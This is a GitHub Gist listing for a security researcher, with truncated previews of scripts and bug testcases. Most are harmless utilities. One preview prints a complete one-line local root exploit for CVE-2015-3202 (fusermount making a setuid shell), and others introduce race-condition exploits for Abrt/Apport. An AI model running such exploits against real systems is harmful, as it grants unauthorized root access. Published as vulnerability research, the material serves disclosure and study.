Skip to content

Instantly share code, notes, and snippets.

Tavis Ormandy taviso

Block or report user

Report or block taviso

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
taviso /
Last active Dec 17, 2019
Using to parse options
# $ bash --my_opt=foo --my_opt bar
# option_index was int:0
# foo
# option_index was int:0
# bar
if ! source; then
echo please install
taviso /
Created Aug 29, 2019
UNIX signals as emoji
declare -ar _status=(
[ 0]=😀 # Success
[ 1]=🤨 # Error
[129]=📞 # SIGHUP
[130]=🛑 # SIGINT
[131]="(╯°□°)╯︵ ┻━┻" # SIGQUIT
[132]=👮 # SIGILL
[133]=🐍 # SIGTRAP
[134]=💥 # SIGABRT
taviso / fbmon.c
Last active Jul 22, 2019
fbmon bug
View fbmon.c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
$ gcc fbmon.c
$ ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
taviso /
Created Jul 12, 2019
Read MSDN pages in a terminal.
# man equivalent for msdn pages so I can look them up in the console.
function msdn()
local lucky=""
local query=""
local title="Microsoft Developer Network"
local cache="${HOME}/.msdn/"
if ! type lynx > /dev/null; then
echo "error: lynx is not installed, please install it." 1>&2
taviso /
Last active Aug 30, 2018
GhostScript Testcase
% This is ghostscript bug #699687 (split out from bug #699654)
% ImageMagick define setpagedevice, just remove their definition. This doesn't
% do anything if not using ImageMagick.
userdict /setpagedevice undef
% function to check if we're on Linux or Windows
/iswindows {
% Just checking if paths contain drive
taviso / DefText.c
Created Nov 8, 2017
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
View DefText.c
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "user32")
#pragma comment(lib, "gdi32")
typedef struct _LARGE_STRING {
ULONG Length;
ULONG MaximumLength:31;
taviso / delete-twitter-dm.js
Created Nov 3, 2017
Automate deleting twitter direct messages.
View delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);
taviso / CVE-2015-3202
Created May 21, 2015
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
View CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
# $b is used twice, first to build the contents of shellscript $a, and then as
taviso / raceabrt.c
Created Apr 14, 2015
Race condition exploit for CVE-2015-1862
View raceabrt.c
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
taviso / newpid.c
Created Apr 14, 2015
Apport/Abrt Vulnerability Demo Exploit.
View newpid.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
You can’t perform that action at this time.